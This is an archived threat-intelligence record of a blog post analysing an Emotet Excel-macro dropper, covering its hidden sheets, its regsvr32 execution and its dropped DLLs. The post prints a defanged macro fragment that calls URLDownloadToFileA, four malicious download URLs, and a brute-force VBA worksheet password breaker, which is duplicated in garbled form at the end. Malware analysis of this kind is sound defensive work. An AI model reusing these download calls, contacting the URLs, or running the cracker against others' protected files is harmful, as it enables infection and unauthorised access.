{
	"id": "ee5aa3f8-a96c-4940-bda5-20c83c3d82b9",
	"created_at": "2026-04-06T00:16:16.405531Z",
	"updated_at": "2026-04-10T03:21:25.845865Z",
	"deleted_at": null,
	"sha1_hash": "4737584885ebcaa363559fae14e74d65a201e864",
	"title": "Emotet Campaign:",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 3361144,
	"plain_text": "Emotet Campaign:\r\nBy Ilan Duhin\r\nPublished: 2023-02-28 · Archived: 2026-04-05 21:08:32 UTC\r\nExecutive Summary:\r\n5 min read\r\nFeb 26, 2023\r\nIn the last months, there has been an extensive campaign in Europe, especially of malware that calls “Emotet”.\r\nThe malware arrives as an Excel file and tries to communicate with a number of URLs and in the end, download\r\nfour DLL files to the machine.\r\nEmotet uses an API call of CreateDirectoryA to create a folder where the files will be saved locally on the\r\ncomputer and from there run through Regsvr32.exe.\r\nPress enter or click to view image in full size\r\nEmotet Behavior\r\nStatic Analysis:\r\nOLE Tools:\r\nPress enter or click to view image in full size\r\nhttps://medium.com/@Ilandu/emotet-campaign-6f240f7a5ed5\r\nPage 1 of 15\n\nChecking the file structure.\r\nPress enter or click to view image in full size\r\nGetting a clue that we have inside the excel 6 sheets.\r\nPress enter or click to view image in full size\r\nChecking the capabilities of the file by using malwoverview.py and get some clues.\r\nPress enter or click to view image in full size\r\nhttps://medium.com/@Ilandu/emotet-campaign-6f240f7a5ed5\r\nPage 2 of 15\n\nGet inside to the third stream and extract his strings.\r\nPress enter or click to view image in full size\r\nFind 4 suspicious URLs.\r\nThe file contains macro. In addition, find all cells that contains the whole code.\r\nhttps://medium.com/@Ilandu/emotet-campaign-6f240f7a5ed5\r\nPage 3 of 15\n\nDynamic Analysis:\r\nFirst, we have try to open the excel (part of office 2021) we notice that it opened without\r\n“Enable Content” pop up. after doing little research, the message shows just on 2007–2013 versions of office.\r\nAfter then, Microsoft blocks the option of enabling running macros automatically.\r\nPress enter or click to view image in full size\r\nTo enable macros we need to change the option like in the picture below:\r\n** in office 2007/2013 it will run by clicking “Enable Content”\r\nPress enter or click to view image in full size\r\nhttps://medium.com/@Ilandu/emotet-campaign-6f240f7a5ed5\r\nPage 4 of 15\n\nNeed to save and enter it again to an excel file.\r\nAnd now…\r\nPress enter or click to view image in full size\r\nWhen we press on the button, four messages pops up.\r\nPress enter or click to view image in full size\r\nhttps://medium.com/@Ilandu/emotet-campaign-6f240f7a5ed5\r\nPage 5 of 15\n\nPress enter or click to view image in full size\r\nchild processes of Excel.\r\nWhen clicking on regsvr32.exe you can see those macros using it to execute the malware. It acts like a dropper\r\nbecause it generates a folder to place his DLL there.\r\nPress enter or click to view image in full size\r\nwhen opening Excel and following the static investigation, we see 6 sheets that was hiding from the victim.\r\nhttps://medium.com/@Ilandu/emotet-campaign-6f240f7a5ed5\r\nPage 6 of 15\n\nEach sheet requires a password.\r\nTo extract the password, we use “password breaker for VBA”.\r\nSource: https://www.instructables.com/VBA-Code-To-Unlock-A-Locked-Excel-Sheet/\r\nSub PasswordBreaker()\r\n‘Breaks worksheet password protection.\r\nDim i As Integer, j As Integer, k As Integer\r\nDim l As Integer, m As Integer, n As Integer\r\nDim i1 As Integer, i2 As Integer, i3 As Integer\r\nDim i4 As Integer, i5 As Integer, i6 As Integer\r\nOn Error Resume Next\r\nFor i = 65 To 66: For j = 65 To 66: For k = 65 To 66\r\nFor l = 65 To 66: For m = 65 To 66: For i1 = 65 To 66\r\nFor i2 = 65 To 66: For i3 = 65 To 66: For i4 = 65 To 66\r\nFor i5 = 65 To 66: For i6 = 65 To 66: For n = 32 To 126\r\nActiveSheet.Unprotect Chr(i) \u0026 Chr(j) \u0026 Chr(k) \u0026 _\r\nChr(l) \u0026 Chr(m) \u0026 Chr(i1) \u0026 Chr(i2) \u0026 Chr(i3) \u0026 _\r\nGet Ilan Duhin’s stories in your inbox\r\nJoin Medium for free to get updates from this writer.\r\nRemember me for faster sign in\r\nChr(i4) \u0026 Chr(i5) \u0026 Chr(i6) \u0026 Chr(n)\r\nhttps://medium.com/@Ilandu/emotet-campaign-6f240f7a5ed5\r\nPage 7 of 15\n\nIf ActiveSheet.ProtectContents = False Then\r\nMsgBox “One usable password is “ \u0026 Chr(i) \u0026 Chr(j) \u0026 _\r\nChr(k) \u0026 Chr(l) \u0026 Chr(m) \u0026 Chr(i1) \u0026 Chr(i2) \u0026 _\r\nChr(i3) \u0026 Chr(i4) \u0026 Chr(i5) \u0026 Chr(i6) \u0026 Chr(n)\r\nExit Sub\r\nEnd If\r\nNext: Next: Next: Next: Next: Next\r\nNext: Next: Next: Next: Next: Next\r\nEnd Sub\r\nTo insert our VBA code we need to press: ALT+F11, paste it and Run.\r\nPress enter or click to view image in full size\r\nhttps://medium.com/@Ilandu/emotet-campaign-6f240f7a5ed5\r\nPage 8 of 15\n\npaste the password breaker inside every sheet.\r\nExcel shows us automatically the password for the requested sheet.\r\nWe can verify it from press right click and see that the sheet is “Protected”.\r\nSheet 1 data:\r\nPress enter or click to view image in full size\r\nhttps://medium.com/@Ilandu/emotet-campaign-6f240f7a5ed5\r\nPage 9 of 15\n\nSheet 2 data:\r\nPress enter or click to view image in full size\r\nWhen we reorganize the strings we see four URL’s:\r\n- URLDownloadToFileA”, “JCCB”, 0, “https://audioselec.c[o]m/about/dDw5ggtyMojggTqhc\r\nhttps://medium.com/@Ilandu/emotet-campaign-6f240f7a5ed5\r\nPage 10 of 15\n\n- https://geringer-muehle.[de]/wp-admin/G/\r\n- http://intolove.co.[uk]/wp-admin/FbGhiWtrEzrQ/\r\n- http://isc.net.[ua]/themes/3rU/\r\nSheet 3 data:\r\nSheet 4 data:\r\nPress enter or click to view image in full size\r\nhttps://medium.com/@Ilandu/emotet-campaign-6f240f7a5ed5\r\nPage 11 of 15\n\nAnother two URL’s that we saw earlier.\r\nSheet 5 data:\r\nPress enter or click to view image in full size\r\nSheet 6 data:\r\nContains the directions of how to summarize the strings.\r\nDLL Analysis:\r\nExport function number 18.\r\nPress enter or click to view image in full size\r\nhttps://medium.com/@Ilandu/emotet-campaign-6f240f7a5ed5\r\nPage 12 of 15\n\nAfter funning the DLL we found a few interesting strings in the memory tab.\r\nPress enter or click to view image in full size\r\nIn addition, it drops itself upon execution to the next path:\r\nPress enter or click to view image in full size\r\nWhen analyzing the memory string of the DLL in VT we got a description of Emotet.\r\nhttps://medium.com/@Ilandu/emotet-campaign-6f240f7a5ed5\r\nPage 13 of 15\n\nPress enter or click to view image in full size\r\nPress enter or click to view image in full size\r\nConclusions:\r\nhttps://medium.com/@Ilandu/emotet-campaign-6f240f7a5ed5\r\nPage 14 of 15\n\n· The macros reach out to download \u0026 execute the Emotet malware.\r\n· The excel file using macros to reach out to web URLs.\r\n· Via regsvr32.exe Emotet doing his execution.\r\n· Emotet dropper is downloaded to a randomly generated folder under %UserProfile%\\Appdata\\Local as a dll file.\r\nSource: https://medium.com/@Ilandu/emotet-campaign-6f240f7a5ed5\r\nhttps://medium.com/@Ilandu/emotet-campaign-6f240f7a5ed5\r\nPage 15 of 15\n\nDim i As Integer, Dim l As Integer, j As Integer, m As Integer, k As Integer n As Integer \nDim i1 As Integer, i2 As Integer, i3 As Integer \nDim i4 As Integer, i5 As Integer, i6 As Integer \nOn Error Resume Next  \nFor i = 65 To 66: For j = 65 To 66: For k = 65 To 66\nFor l = 65 To 66: For m = 65 To 66: For i1 = 65 To 66\nFor i2 = 65 To 66: For i3 = 65 To 66: For i4 = 65 To 66\nFor i5 = 65 To 66: For i6 = 65 To 66: For n = 32 To 126\nActiveSheet.Unprotect Chr(i) \u0026 Chr(j) \u0026 Chr(k) \u0026 _\nChr(l) \u0026 Chr(m) \u0026 Chr(i1) \u0026 Chr(i2) \u0026 Chr(i3) \u0026 _\nGet Ilan Duhin’s stories in your inbox \nJoin Medium for free to get updates from this writer.\nRemember me for faster sign in  \nChr(i4) \u0026 Chr(i5) \u0026 Chr(i6) \u0026 Chr(n) \n   Page 7 of 15",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://medium.com/@Ilandu/emotet-campaign-6f240f7a5ed5"
	],
	"report_names": [
		"emotet-campaign-6f240f7a5ed5"
	],
	"threat_actors": [],
	"ts_created_at": 1775434576,
	"ts_updated_at": 1775791285,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/4737584885ebcaa363559fae14e74d65a201e864.pdf",
		"text": "https://archive.orkl.eu/4737584885ebcaa363559fae14e74d65a201e864.txt",
		"img": "https://archive.orkl.eu/4737584885ebcaa363559fae14e74d65a201e864.jpg"
	}
}